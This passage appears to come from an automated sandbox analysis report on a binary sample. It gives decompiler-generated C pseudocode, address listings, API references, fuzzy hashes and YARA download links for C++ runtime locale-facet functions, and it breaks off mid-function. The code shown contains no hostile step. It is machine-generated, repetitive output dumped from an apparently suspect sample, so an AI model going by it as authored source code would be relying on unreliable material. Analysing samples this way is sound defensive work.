				if(_t237 >=  *((intOrPtr*)(_t200 + 0xc))) {
					_t250 = 0;
					__eflags = 0;
					goto L8;
				} else {
					_t250 =  *((intOrPtr*)( *((intOrPtr*)(_t200 + 8)) + _t237 * 4));
					if(_t250 != 0) {
						L16:
						E004133F5( &_v16);
						return _t250;
					} else {
						L8:
						if( *((char*)(_t200 + 0x14)) == 0) {
							L11:
							if(_t250 != 0) {
								goto L16;
							} else {
								goto L12;
							}
						} else {
							_t179 = E00413DB2();
							if(_t237 >=  *((intOrPtr*)(_t179 + 0xc))) {
								L12:
								if(_t187 == 0) {
									_t111 = E00409950(_t231, _t250, _t269,  &_v24, _t269);
									_t284 = _t282 + 8;
									__eflags = _t111 - 0xffffffff;
									if(__eflags == 0) {
										asm("xorps xmm0, xmm0");
										_v12 = 0x4375b4;
										asm("movq [esp+0x24], xmm0");
										_v8 = "bad cast";
										E00416C8D( &_v12, 0x446bf8);
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										_t285 = _t284 - 0x18;
										_push(_t187);
										_push(_t269);
										_push(_t250);
										_push(_t237);
										E0041339D( &_v56, 0);
										_t239 =  *0x44d468; // 0x1
										_t189 =  *0x44c800; // 0x290de8
										_v68 = _t189;
										__eflags = _t239;
										if(_t239 == 0) {
											E0041339D( &_v60, _t239);
											__eflags =  *0x44d468 - _t239; // 0x1
											if(__eflags == 0) {
												_t173 =  *0x44d448; // 0x2
												_t174 = _t173 + 1;
												__eflags = _t174;
												 *0x44d448 = _t174;
												 *0x44d468 = _t174;
											}
											E004133F5( &_v60);
											_t239 =  *0x44d468; // 0x1
										}
										_t271 = _v36;
										_t203 = _a4;
										__eflags = _t239 -  *((intOrPtr*)(_t203 + 0xc));
										if(_t239 >=  *((intOrPtr*)(_t203 + 0xc))) {
											_t252 = 0;
											__eflags = 0;
											goto L26;
										} else {
											_t252 =  *( *((intOrPtr*)(_t203 + 8)) + _t239 * 4);
											__eflags = _t252;
											if(_t252 != 0) {
												L34:
												E004133F5( &_v56);
												return _t252;
											} else {
												L26:
												__eflags =  *((char*)(_t203 + 0x14));
												if( *((char*)(_t203 + 0x14)) == 0) {
													L29:
													__eflags = _t252;
													if(_t252 != 0) {
														goto L34;
													} else {
														goto L30;
													}
												} else {
													_t168 = E00413DB2();
													__eflags = _t239 -  *((intOrPtr*)(_t168 + 0xc));
													if(_t239 >=  *((intOrPtr*)(_t168 + 0xc))) {
														L30:
														__eflags = _t189;
														if(_t189 == 0) {
															_t118 = E004099F0(_t231,  &_v64, _t271);
															_t287 = _t285 + 8;
															__eflags = _t118 - 0xffffffff;
															if(__eflags == 0) {
																asm("xorps xmm0, xmm0");
																_v52 = 0x4375b4;
																asm("movq [esp+0x24], xmm0");
																_v48 = "bad cast";
																E00416C8D( &_v52, 0x446bf8);
																asm("int3");
																asm("int3");
																asm("int3");
																asm("int3");
																_t288 = _t287 - 0x18;
																_push(_t189);
																_push(_t271);
																_push(_t252);
																_push(_t239);
																E0041339D( &_v96, 0);
																_t241 =  *0x44c7f4; // 0x0
																_t191 =  *0x44c814; // 0x0
																_v108 = _t191;
																__eflags = _t241;
																if(_t241 == 0) {
																	E0041339D( &_v100, _t241);
																	__eflags =  *0x44c7f4 - _t241; // 0x0
																	if(__eflags == 0) {
																		_t162 =  *0x44d448; // 0x2
																		_t163 = _t162 + 1;
																		__eflags = _t163;
																		 *0x44d448 = _t163;
																		 *0x44c7f4 = _t163;
																	}
																	E004133F5( &_v100);
																	_t241 =  *0x44c7f4; // 0x0
																}
																_t273 = _v76;
																_t206 = _a4;
																__eflags = _t241 -  *((intOrPtr*)(_t206 + 0xc));
																if(_t241 >=  *((intOrPtr*)(_t206 + 0xc))) {
																	_t254 = 0;
																	__eflags = 0;
																	goto L44;
																} else {
																	_t254 =  *( *((intOrPtr*)(_t206 + 8)) + _t241 * 4);
																	__eflags = _t254;
																	if(_t254 != 0) {
																		L52:
																		E004133F5( &_v96);
																		return _t254;
																	} else {
																		L44:
																		__eflags =  *((char*)(_t206 + 0x14));
																		if( *((char*)(_t206 + 0x14)) == 0) {
																			L47:
																			__eflags = _t254;
																			if(_t254 != 0) {
																				goto L52;
																			} else {
																				goto L48;
																			}
																		} else {
																			_t157 = E00413DB2();
																			__eflags = _t241 -  *((intOrPtr*)(_t157 + 0xc));
																			if(_t241 >=  *((intOrPtr*)(_t157 + 0xc))) {
																				L48:
																				__eflags = _t191;
																				if(_t191 == 0) {
																					_t125 = E00409A80(_t231,  &_v104, _t273);
																					_t290 = _t288 + 8;
																					__eflags = _t125 - 0xffffffff;
																					if(__eflags == 0) {
																						asm("xorps xmm0, xmm0");
																						_v92 = 0x4375b4;
																						asm("movq [esp+0x24], xmm0");
																						_v88 = "bad cast";
																						E00416C8D( &_v92, 0x446bf8);
																						asm("int3");
																						asm("int3");
																						asm("int3");
																						asm("int3");
																						_t291 = _t290 - 0x18;
																						_push(_t191);
																						_push(_t273);
																						_push(_t254);
																						_push(_t241);
																						E0041339D( &_v136, 0);
																						_t243 =  *0x44c7f8; // 0x0
																						_t193 =  *0x44c818; // 0x0
																						_v148 = _t193;
																						__eflags = _t243;
																						if(_t243 == 0) {
																							E0041339D( &_v140, _t243);
																							__eflags =  *0x44c7f8 - _t243; // 0x0
																							if(__eflags == 0) {
																								_t151 =  *0x44d448; // 0x2
																								_t152 = _t151 + 1;
																								__eflags = _t152;
																								 *0x44d448 = _t152;
																								 *0x44c7f8 = _t152;
																							}
																							E004133F5( &_v140);
																							_t243 =  *0x44c7f8; // 0x0
																						}
																						_t275 = _v116;
																						_t209 = _a4;
																						__eflags = _t243 - _t209[3];
																						if(_t243 >= _t209[3]) {
																							_t256 = 0;
																							__eflags = 0;
																							goto L62;
																						} else {
																							_t256 =  *(_t209[2] + _t243 * 4);
																							__eflags = _t256;
																							if(_t256 != 0) {
																								L70:
																								E004133F5( &_v136);
																								return _t256;
																							} else {
																								L62:
																								__eflags = _t209[5];
																								if(_t209[5] == 0) {
																									L65:
																									__eflags = _t256;
																									if(_t256 != 0) {
																										goto L70;
																									} else {
																										goto L66;
																									}
																								} else {
																									_t146 = E00413DB2();
																									__eflags = _t243 -  *((intOrPtr*)(_t146 + 0xc));
																									if(_t243 >=  *((intOrPtr*)(_t146 + 0xc))) {
																										L66:
																										__eflags = _t193;
																										if(_t193 == 0) {
																											_t132 = E00409B00(_t231,  &_v144, _t275);
																											_t293 = _t291 + 8;
																											__eflags = _t132 - 0xffffffff;
																											if(__eflags == 0) {
																												asm("xorps xmm0, xmm0");
																												_v132 = 0x4375b4;
																												asm("movq [esp+0x24], xmm0");
																												_v128 = "bad cast";
																												E00416C8D( &_v132, 0x446bf8);
																												asm("int3");
																												asm("int3");
																												asm("int3");
																												asm("int3");
																												_push(_t256);
																												_t258 = _t209;
																												_t135 = E0041500C(_t231, __eflags, 0x24);
																												__eflags = _t135;
																												if(_t135 == 0) {
																													_t135 = 0;
																													__eflags = 0;
																												} else {
																													 *((intOrPtr*)(_t135 + 4)) = 0x14;
																													 *((intOrPtr*)(_t135 + 8)) = 0;
																													 *((intOrPtr*)(_t135 + 0xc)) = 0;
																													 *((intOrPtr*)(_t135 + 0x10)) = 0;
																													 *_t135 = 0x437540;
																													 *((intOrPtr*)(_t135 + 0x18)) = 0;
																													 *((intOrPtr*)(_t135 + 0x1c)) = 0;
																													 *((intOrPtr*)(_t135 + 0x20)) = 0;
																												}
																												_t211 = _v152;
																												 *_t258 = _t135;
																												_t258[1] = _t135;
																												_t258[3] = _v156;
																												_t258[2] = _t211;
																												_t258[4] =  !(_t211 >> 3) & 0x00000100;
																												_t214 =  !(_t211 >> 9) & 0x00000004;
																												__eflags = _t214;
																												_t258[5] = _t214;
																												return _t258;
																											} else {
																												_t256 = _v144;
																												 *0x44c818 = _t256;
																												 *((intOrPtr*)( *_t256 + 4))();
																												E00413D84(__eflags, _t256);
																												_t291 = _t293 + 4;
																												goto L70;
																											}
																										} else {
																											E004133F5( &_v136);
																											return _t193;
																										}
																									} else {
																										_t256 =  *( *((intOrPtr*)(_t146 + 8)) + _t243 * 4);
																										goto L65;
																									}
																								}
																							}
																						}
																					} else {
																						_t254 = _v104;
																						 *0x44c814 = _t254;
																						 *((intOrPtr*)( *_t254 + 4))();
																						E00413D84(__eflags, _t254);
																						_t288 = _t290 + 4;
																						goto L52;
																					}
																				} else {
																					E004133F5( &_v96);
																					return _t191;
																				}
																			} else {
																				_t254 =  *( *((intOrPtr*)(_t157 + 8)) + _t241 * 4);
																				goto L47;
																			}
																		}
																	}
																}
															} else {
																_t252 = _v64;
																 *0x44c800 = _t252;
																 *((intOrPtr*)( *_t252 + 4))();
																E00413D84(__eflags, _t252);
																_t285 = _t287 + 4;
																goto L34;
															}
														} else {
															E004133F5( &_v56);
															return _t189;
														}
													} else {
														_t252 =  *( *((intOrPtr*)(_t168 + 8)) + _t239 * 4);
														goto L29;
													}
												}
											}
										}
									} else {
										_t250 = _v24;
										 *0x44c760 = _t250;
										 *((intOrPtr*)( *_t250 + 4))();
										E00413D84(__eflags, _t250);
										_t282 = _t284 + 4;
										goto L16;
									}
								} else {
									E004133F5( &_v16);
									return _t187;
								}
							} else {
								_t250 =  *((intOrPtr*)( *((intOrPtr*)(_t179 + 8)) + _t237 * 4));
								goto L11;
							}
						}
					}
				}
			}

0x00403960
0x00403960
0x00403964
0x0040396d
0x00403972
0x00403978
0x0040397e
0x00403984
0x0040398b
0x00403990
0x00403996
0x00403998
0x0040399d
0x0040399e
0x004039a3
0x004039a3
0x004039ac
0x004039b1
0x004039b1
0x004039b7
0x004039bb
0x004039c1
0x004039cf
0x004039cf
0x00000000
0x004039c3
0x004039c6
0x004039cb
0x00403a31
0x00403a35
0x00403a43
0x004039cd
0x004039d1
0x004039d5
0x004039e7
0x004039e9
0x00000000
0x00000000
0x00000000
0x00000000
0x004039d7
0x004039d7
0x004039df
0x004039eb
0x004039ed
0x00403a0a
0x00403a0f
0x00403a12
0x00403a15
0x00403a44
0x00403a47
0x00403a58
0x00403a5f
0x00403a67
0x00403a6c
0x00403a6d
0x00403a6e
0x00403a6f
0x00403a70
0x00403a73
0x00403a74
0x00403a75
0x00403a76
0x00403a7d
0x00403a82
0x00403a88
0x00403a8e
0x00403a92
0x00403a94
0x00403a9b
0x00403aa0
0x00403aa6
0x00403aa8
0x00403aad
0x00403aad
0x00403aae
0x00403ab3
0x00403ab3
0x00403abc
0x00403ac1
0x00403ac1
0x00403ac7
0x00403acb
0x00403ace
0x00403ad1
0x00403adf
0x00403adf
0x00000000
0x00403ad3
0x00403ad6
0x00403ad9
0x00403adb
0x00403b41
0x00403b45
0x00403b53
0x00403add
0x00403ae1
0x00403ae1
0x00403ae5
0x00403af7
0x00403af7
0x00403af9
0x00000000
0x00000000
0x00000000
0x00000000
0x00403ae7
0x00403ae7
0x00403aec
0x00403aef
0x00403afb
0x00403afb
0x00403afd
0x00403b1a
0x00403b1f
0x00403b22
0x00403b25
0x00403b54
0x00403b57
0x00403b68
0x00403b6f
0x00403b77
0x00403b7c
0x00403b7d
0x00403b7e
0x00403b7f
0x00403b80
0x00403b83
0x00403b84
0x00403b85
0x00403b86
0x00403b8d
0x00403b92
0x00403b98
0x00403b9e
0x00403ba2
0x00403ba4
0x00403bab
0x00403bb0
0x00403bb6
0x00403bb8
0x00403bbd
0x00403bbd
0x00403bbe
0x00403bc3
0x00403bc3
0x00403bcc
0x00403bd1
0x00403bd1
0x00403bd7
0x00403bdb
0x00403bde
0x00403be1
0x00403bef
0x00403bef
0x00000000
0x00403be3
0x00403be6
0x00403be9
0x00403beb
0x00403c51
0x00403c55
0x00403c63
0x00403bed
0x00403bf1
0x00403bf1
0x00403bf5
0x00403c07
0x00403c07
0x00403c09
0x00000000
0x00000000
0x00000000
0x00000000
0x00403bf7
0x00403bf7
0x00403bfc
0x00403bff
0x00403c0b
0x00403c0b
0x00403c0d
0x00403c2a
0x00403c2f
0x00403c32
0x00403c35
0x00403c64
0x00403c67
0x00403c78
0x00403c7f
0x00403c87
0x00403c8c
0x00403c8d
0x00403c8e
0x00403c8f
0x00403c90
0x00403c93
0x00403c94
0x00403c95
0x00403c96
0x00403c9d
0x00403ca2
0x00403ca8
0x00403cae
0x00403cb2
0x00403cb4
0x00403cbb
0x00403cc0
0x00403cc6
0x00403cc8
0x00403ccd
0x00403ccd
0x00403cce
0x00403cd3
0x00403cd3
0x00403cdc
0x00403ce1
0x00403ce1
0x00403ce7
0x00403ceb
0x00403cee
0x00403cf1
0x00403cff
0x00403cff
0x00000000
0x00403cf3
0x00403cf6
0x00403cf9
0x00403cfb
0x00403d61
0x00403d65
0x00403d73
0x00403cfd
0x00403d01
0x00403d01
0x00403d05
0x00403d17
0x00403d17
0x00403d19
0x00000000
0x00000000
0x00000000
0x00000000
0x00403d07
0x00403d07
0x00403d0c
0x00403d0f
0x00403d1b
0x00403d1b
0x00403d1d
0x00403d3a
0x00403d3f
0x00403d42
0x00403d45
0x00403d74
0x00403d77
0x00403d88
0x00403d8f
0x00403d97
0x00403d9c
0x00403d9d
0x00403d9e
0x00403d9f
0x00403da0
0x00403da3
0x00403da5
0x00403dad
0x00403daf
0x00403dea
0x00403dea
0x00403db1
0x00403db1
0x00403db8
0x00403dbf
0x00403dc6
0x00403dcd
0x00403dd3
0x00403dda
0x00403de1
0x00403de1
0x00403dec
0x00403df0
0x00403df2
0x00403df9
0x00403dfe
0x00403e10
0x00403e13
0x00403e13
0x00403e16
0x00403e1c
0x00403d47
0x00403d47
0x00403d4d
0x00403d55
0x00403d59
0x00403d5e
0x00000000
0x00403d5e
0x00403d1f
0x00403d25
0x00403d33
0x00403d33
0x00403d11
0x00403d14
0x00000000
0x00403d14
0x00403d0f
0x00403d05
0x00403cfb
0x00403c37
0x00403c37
0x00403c3d
0x00403c45
0x00403c49
0x00403c4e
0x00000000
0x00403c4e
0x00403c0f
0x00403c15
0x00403c23
0x00403c23
0x00403c01
0x00403c04
0x00000000
0x00403c04
0x00403bff
0x00403bf5
0x00403beb
0x00403b27
0x00403b27
0x00403b2d
0x00403b35
0x00403b39
0x00403b3e
0x00000000
0x00403b3e
0x00403aff
0x00403b05
0x00403b13
0x00403b13
0x00403af1
0x00403af4
0x00000000
0x00403af4
0x00403aef
0x00403ae5
0x00403adb
0x00403a17
0x00403a17
0x00403a1d
0x00403a25
0x00403a29
0x00403a2e
0x00000000
0x00403a2e
0x004039ef
0x004039f5
0x00403a03
0x00403a03
0x004039e1
0x004039e4
0x00000000
0x004039e4
0x004039df
0x004039d5
0x004039cb

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0040396D
std::_Lockit::_Lockit.LIBCPMT ref: 0040398B
std::_Lockit::~_Lockit.LIBCPMT ref: 004039AC
std::_Lockit::~_Lockit.LIBCPMT ref: 004039F5

Part of subcall function 00409950: new.LIBCMT ref: 0040996A

std::_Facet_Register.LIBCPMT ref: 00403A29

Part of subcall function 00413D84: new.LIBCMT ref: 00413D8A

std::_Lockit::~_Lockit.LIBCPMT ref: 00403A35
__CxxThrowException@8.LIBVCRUNTIME ref: 00403A67

Part of subcall function 00416C8D: KiUserExceptionDispatcher.NTDLL(?,?,0041371A,?,00000008,?,1FFFFFFF,?,?,?,?,0041371A,?,00447D68,?), ref: 00416CEC

Memory Dump Source

Source File: 00000005.00000001.1669075870.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.1668983266.00400000.00000002.sdmp Download File
Associated: 00000005.00000001.1670705928.00437000.00000002.sdmp Download File
Associated: 00000005.00000001.1670872174.0044A000.00000008.sdmp Download File
Associated: 00000005.00000001.1670885737.0044B000.00000004.sdmp Download File
Associated: 00000005.00000001.1670906384.00450000.00000008.sdmp Download File
Associated: 00000005.00000001.1670915612.00451000.00000002.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::~_$Lockit::_$DispatcherExceptionException@8Facet_RegisterThrowUser
String ID:
API String ID: 2318137220-0
Opcode ID: c778b2620ccaabfe49b34d6e91d7b561f2c33582c617bb9d34d8e1ed5fd731f5
Instruction ID: e820cf9ba9a97d65138d50ffd5aa3be5a8a95595edec9c89a415660cb2172870
Opcode Fuzzy Hash: c778b2620ccaabfe49b34d6e91d7b561f2c33582c617bb9d34d8e1ed5fd731f5
Instruction Fuzzy Hash: 1C31E6756043058BC320EF05D88155ABBA8EF95325F09057FF894A72A2DB38AE45CF9A

Uniqueness

Uniqueness Score: 100.00%

Function 00403B80, Relevance: 10.6, APIs: 7, Instructions: 92
UNIQUE

Download Yara Rule

C-Code - Quality: 86%

			E00403B80(void* __ebx, void* __edx, void* __edi, void* __ebp, signed int* _a4) {
				char* _v8;
				char _v12;
				char _v16;
				char _v20;
				void* _v24;
				intOrPtr _v28;
				intOrPtr _v36;
				char* _v48;
				char _v52;
				char _v56;
				char _v60;
				signed int _v64;
				signed int _v68;
				unsigned int _v72;
				signed int _v76;
				void* _t65;
				void* _t72;
				signed int _t75;
				void* _t86;
				signed int _t91;
				signed int _t92;
				void* _t97;
				signed int _t102;
				signed int _t103;
				intOrPtr _t105;
				signed int _t107;
				signed int* _t112;
				signed int* _t115;
				unsigned int _t117;
				signed int _t120;
				void* _t129;
				signed int _t133;
				signed int _t135;
				intOrPtr* _t140;
				signed int _t142;
				signed int* _t144;
				signed int* _t151;
				intOrPtr _t153;
				void* _t157;
				void* _t158;
				void* _t160;
				void* _t161;
				void* _t163;
				void* _t168;

				_t129 = __edx;
				_t158 = _t157 - 0x18;
				E0041339D( &_v16, 0);
				_t133 =  *0x44c7f4; // 0x0
				_t105 =  *0x44c814; // 0x0
				_v28 = _t105;
				if(_t133 == 0) {
					E0041339D( &_v20, _t133);
					_t168 =  *0x44c7f4 - _t133; // 0x0
					if(_t168 == 0) {
						_t102 =  *0x44d448; // 0x2
						_t103 = _t102 + 1;
						 *0x44d448 = _t103;
						 *0x44c7f4 = _t103;
					}
					E004133F5( &_v20);
					_t133 =  *0x44c7f4; // 0x0
				}
				_t151 = _a4;
				_t112 = _a4;
				if(_t133 >=  *((intOrPtr*)(_t112 + 0xc))) {
					_t140 = 0;
					__eflags = 0;
					goto L8;
				} else {
					_t140 =  *((intOrPtr*)( *((intOrPtr*)(_t112 + 8)) + _t133 * 4));
					if(_t140 != 0) {
						L16:
						E004133F5( &_v16);
						return _t140;
					} else {
						L8:
						if( *((char*)(_t112 + 0x14)) == 0) {
							L11:
							if(_t140 != 0) {
								goto L16;
							} else {
								goto L12;
							}
						} else {
							_t97 = E00413DB2();
							if(_t133 >=  *((intOrPtr*)(_t97 + 0xc))) {
								L12:
								if(_t105 == 0) {
									_t65 = E00409A80(_t129,  &_v24, _t151);
									_t160 = _t158 + 8;
									__eflags = _t65 - 0xffffffff;
									if(__eflags == 0) {
										asm("xorps xmm0, xmm0");
										_v12 = 0x4375b4;
										asm("movq [esp+0x24], xmm0");
										_v8 = "bad cast";
										E00416C8D( &_v12, 0x446bf8);
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										_t161 = _t160 - 0x18;
										_push(_t105);
										_push(_t151);
										_push(_t140);
										_push(_t133);
										E0041339D( &_v56, 0);
										_t135 =  *0x44c7f8; // 0x0
										_t107 =  *0x44c818; // 0x0
										_v68 = _t107;
										__eflags = _t135;
										if(_t135 == 0) {
											E0041339D( &_v60, _t135);
											__eflags =  *0x44c7f8 - _t135; // 0x0
											if(__eflags == 0) {
												_t91 =  *0x44d448; // 0x2
												_t92 = _t91 + 1;
												__eflags = _t92;
												 *0x44d448 = _t92;
												 *0x44c7f8 = _t92;
											}
											E004133F5( &_v60);
											_t135 =  *0x44c7f8; // 0x0
										}
										_t153 = _v36;
										_t115 = _a4;
										__eflags = _t135 - _t115[3];
										if(_t135 >= _t115[3]) {
											_t142 = 0;
											__eflags = 0;
											goto L26;
										} else {
											_t142 =  *(_t115[2] + _t135 * 4);
											__eflags = _t142;
											if(_t142 != 0) {
												L34:
												E004133F5( &_v56);
												return _t142;
											} else {
												L26:
												__eflags = _t115[5];
												if(_t115[5] == 0) {
													L29:
													__eflags = _t142;
													if(_t142 != 0) {
														goto L34;
													} else {
														goto L30;
													}
												} else {
													_t86 = E00413DB2();
													__eflags = _t135 -  *((intOrPtr*)(_t86 + 0xc));
													if(_t135 >=  *((intOrPtr*)(_t86 + 0xc))) {
														L30:
														__eflags = _t107;
														if(_t107 == 0) {
															_t72 = E00409B00(_t129,  &_v64, _t153);
															_t163 = _t161 + 8;
															__eflags = _t72 - 0xffffffff;
															if(__eflags == 0) {
																asm("xorps xmm0, xmm0");
																_v52 = 0x4375b4;
																asm("movq [esp+0x24], xmm0");
																_v48 = "bad cast";
																E00416C8D( &_v52, 0x446bf8);
																asm("int3");
																asm("int3");
																asm("int3");
																asm("int3");
																_push(_t142);
																_t144 = _t115;
																_t75 = E0041500C(_t129, __eflags, 0x24);
																__eflags = _t75;
																if(_t75 == 0) {
																	_t75 = 0;
																	__eflags = 0;
																} else {
																	 *((intOrPtr*)(_t75 + 4)) = 0x14;
																	 *((intOrPtr*)(_t75 + 8)) = 0;
																	 *((intOrPtr*)(_t75 + 0xc)) = 0;
																	 *((intOrPtr*)(_t75 + 0x10)) = 0;
																	 *_t75 = 0x437540;
																	 *((intOrPtr*)(_t75 + 0x18)) = 0;
																	 *((intOrPtr*)(_t75 + 0x1c)) = 0;
																	 *((intOrPtr*)(_t75 + 0x20)) = 0;
																}
																_t117 = _v72;
																 *_t144 = _t75;
																_t144[1] = _t75;
																_t144[3] = _v76;
																_t144[2] = _t117;
																_t144[4] =  !(_t117 >> 3) & 0x00000100;
																_t120 =  !(_t117 >> 9) & 0x00000004;
																__eflags = _t120;
																_t144[5] = _t120;
																return _t144;
															} else {
																_t142 = _v64;
																 *0x44c818 = _t142;
																 *((intOrPtr*)( *_t142 + 4))();
																E00413D84(__eflags, _t142);
																_t161 = _t163 + 4;
																goto L34;
															}
														} else {
															E004133F5( &_v56);
															return _t107;
														}
													} else {
														_t142 =  *( *((intOrPtr*)(_t86 + 8)) + _t135 * 4);
														goto L29;
													}
												}
											}
										}
									} else {
										_t140 = _v24;
										 *0x44c814 = _t140;
										 *((intOrPtr*)( *_t140 + 4))();
										E00413D84(__eflags, _t140);
										_t158 = _t160 + 4;
										goto L16;
									}
								} else {
									E004133F5( &_v16);
									return _t105;
								}
							} else {
								_t140 =  *((intOrPtr*)( *((intOrPtr*)(_t97 + 8)) + _t133 * 4));
								goto L11;
							}
						}
					}
				}
			}

0x00403b80
0x00403b80
0x00403b8d
0x00403b92
0x00403b98
0x00403b9e
0x00403ba4
0x00403bab
0x00403bb0
0x00403bb6
0x00403bb8
0x00403bbd
0x00403bbe
0x00403bc3
0x00403bc3
0x00403bcc
0x00403bd1
0x00403bd1
0x00403bd7
0x00403bdb
0x00403be1
0x00403bef
0x00403bef
0x00000000
0x00403be3
0x00403be6
0x00403beb
0x00403c51
0x00403c55
0x00403c63
0x00403bed
0x00403bf1
0x00403bf5
0x00403c07
0x00403c09
0x00000000
0x00000000
0x00000000
0x00000000
0x00403bf7
0x00403bf7
0x00403bff
0x00403c0b
0x00403c0d
0x00403c2a
0x00403c2f
0x00403c32
0x00403c35
0x00403c64
0x00403c67
0x00403c78
0x00403c7f
0x00403c87
0x00403c8c
0x00403c8d
0x00403c8e
0x00403c8f
0x00403c90
0x00403c93
0x00403c94
0x00403c95
0x00403c96
0x00403c9d
0x00403ca2
0x00403ca8
0x00403cae
0x00403cb2
0x00403cb4
0x00403cbb
0x00403cc0
0x00403cc6
0x00403cc8
0x00403ccd
0x00403ccd
0x00403cce
0x00403cd3
0x00403cd3
0x00403cdc
0x00403ce1
0x00403ce1
0x00403ce7
0x00403ceb
0x00403cee
0x00403cf1
0x00403cff
0x00403cff
0x00000000
0x00403cf3
0x00403cf6
0x00403cf9
0x00403cfb
0x00403d61
0x00403d65
0x00403d73
0x00403cfd
0x00403d01
0x00403d01
0x00403d05
0x00403d17
0x00403d17
0x00403d19
0x00000000
0x00000000
0x00000000
0x00000000
0x00403d07
0x00403d07
0x00403d0c
0x00403d0f
0x00403d1b
0x00403d1b
0x00403d1d
0x00403d3a
0x00403d3f
0x00403d42
0x00403d45
0x00403d74
0x00403d77
0x00403d88
0x00403d8f
0x00403d97
0x00403d9c
0x00403d9d
0x00403d9e
0x00403d9f
0x00403da0
0x00403da3
0x00403da5
0x00403dad
0x00403daf
0x00403dea
0x00403dea
0x00403db1
0x00403db1
0x00403db8
0x00403dbf
0x00403dc6
0x00403dcd
0x00403dd3
0x00403dda
0x00403de1
0x00403de1
0x00403dec
0x00403df0
0x00403df2
0x00403df9
0x00403dfe
0x00403e10
0x00403e13
0x00403e13
0x00403e16
0x00403e1c
0x00403d47
0x00403d47
0x00403d4d
0x00403d55
0x00403d59
0x00403d5e
0x00000000
0x00403d5e
0x00403d1f
0x00403d25
0x00403d33
0x00403d33
0x00403d11
0x00403d14
0x00000000
0x00403d14
0x00403d0f
0x00403d05
0x00403cfb
0x00403c37
0x00403c37
0x00403c3d
0x00403c45
0x00403c49
0x00403c4e
0x00000000
0x00403c4e
0x00403c0f
0x00403c15
0x00403c23
0x00403c23
0x00403c01
0x00403c04
0x00000000
0x00403c04
0x00403bff
0x00403bf5
0x00403beb

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00403B8D
std::_Lockit::_Lockit.LIBCPMT ref: 00403BAB
std::_Lockit::~_Lockit.LIBCPMT ref: 00403BCC
std::_Lockit::~_Lockit.LIBCPMT ref: 00403C15

Part of subcall function 00409A80: new.LIBCMT ref: 00409A9A

std::_Facet_Register.LIBCPMT ref: 00403C49

Part of subcall function 00413D84: new.LIBCMT ref: 00413D8A

std::_Lockit::~_Lockit.LIBCPMT ref: 00403C55
__CxxThrowException@8.LIBVCRUNTIME ref: 00403C87

Part of subcall function 00416C8D: KiUserExceptionDispatcher.NTDLL(?,?,0041371A,?,00000008,?,1FFFFFFF,?,?,?,?,0041371A,?,00447D68,?), ref: 00416CEC

Memory Dump Source

Source File: 00000005.00000001.1669075870.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.1668983266.00400000.00000002.sdmp Download File
Associated: 00000005.00000001.1670705928.00437000.00000002.sdmp Download File
Associated: 00000005.00000001.1670872174.0044A000.00000008.sdmp Download File
Associated: 00000005.00000001.1670885737.0044B000.00000004.sdmp Download File
Associated: 00000005.00000001.1670906384.00450000.00000008.sdmp Download File
Associated: 00000005.00000001.1670915612.00451000.00000002.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::~_$Lockit::_$DispatcherExceptionException@8Facet_RegisterThrowUser
String ID:
API String ID: 2318137220-0
Opcode ID: 7f0f4d32ae8a226ef8376c0213b1b8667a8b67c085e1a218c19dfba77a2bbbc4
Instruction ID: 74bfb6ad34a8f5f7514e7266f684f98d5dbc39d6e4abe1dff9a47ff8a2a56193
Opcode Fuzzy Hash: 7f0f4d32ae8a226ef8376c0213b1b8667a8b67c085e1a218c19dfba77a2bbbc4
Instruction Fuzzy Hash: CC31E8765043018BC314EF18D88159ABBE8EB95329F18057FF854A7292DB38FE45CB9A

Uniqueness

Uniqueness Score: 100.00%

Function 00403C90, Relevance: 10.6, APIs: 7, Instructions: 92
UNIQUE

Download Yara Rule

C-Code - Quality: 89%

			E00403C90(void* __ebx, void* __edx, void* __edi, void* __ebp, signed int* _a4) {
				char* _v8;
				char _v12;
				char _v16;
				char _v20;
				void* _v24;
				intOrPtr _v28;
				unsigned int _v32;
				signed int _v36;
				void* _t42;
				signed int _t45;
				void* _t56;
				signed int _t61;
				signed int _t62;
				intOrPtr _t64;
				signed int* _t68;
				unsigned int _t70;
				signed int _t73;
				void* _t78;
				signed int _t81;
				intOrPtr* _t85;
				signed int* _t87;
				signed int* _t92;
				void* _t95;
				void* _t96;
				void* _t98;
				void* _t102;

				_t78 = __edx;
				_t96 = _t95 - 0x18;
				E0041339D( &_v16, 0);
				_t81 =  *0x44c7f8; // 0x0
				_t64 =  *0x44c818; // 0x0
				_v28 = _t64;
				if(_t81 == 0) {
					E0041339D( &_v20, _t81);
					_t102 =  *0x44c7f8 - _t81; // 0x0
					if(_t102 == 0) {
						_t61 =  *0x44d448; // 0x2
						_t62 = _t61 + 1;
						 *0x44d448 = _t62;
						 *0x44c7f8 = _t62;
					}
					E004133F5( &_v20);
					_t81 =  *0x44c7f8; // 0x0
				}
				_t92 = _a4;
				_t68 = _a4;
				if(_t81 >= _t68[3]) {
					_t85 = 0;
					__eflags = 0;
					goto L8;
				} else {
					_t85 =  *((intOrPtr*)(_t68[2] + _t81 * 4));
					if(_t85 != 0) {
						L16:
						E004133F5( &_v16);
						return _t85;
					} else {
						L8:
						if(_t68[5] == 0) {
							L11:
							if(_t85 != 0) {
								goto L16;
							} else {
								goto L12;
							}
						} else {
							_t56 = E00413DB2();
							if(_t81 >=  *((intOrPtr*)(_t56 + 0xc))) {
								L12:
								if(_t64 == 0) {
									_t42 = E00409B00(_t78,  &_v24, _t92);
									_t98 = _t96 + 8;
									__eflags = _t42 - 0xffffffff;
									if(__eflags == 0) {
										asm("xorps xmm0, xmm0");
										_v12 = 0x4375b4;
										asm("movq [esp+0x24], xmm0");
										_v8 = "bad cast";
										E00416C8D( &_v12, 0x446bf8);
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										_push(_t85);
										_t87 = _t68;
										_t45 = E0041500C(_t78, __eflags, 0x24);
										__eflags = _t45;
										if(_t45 == 0) {
											_t45 = 0;
											__eflags = 0;
										} else {
											 *((intOrPtr*)(_t45 + 4)) = 0x14;
											 *((intOrPtr*)(_t45 + 8)) = 0;
											 *((intOrPtr*)(_t45 + 0xc)) = 0;
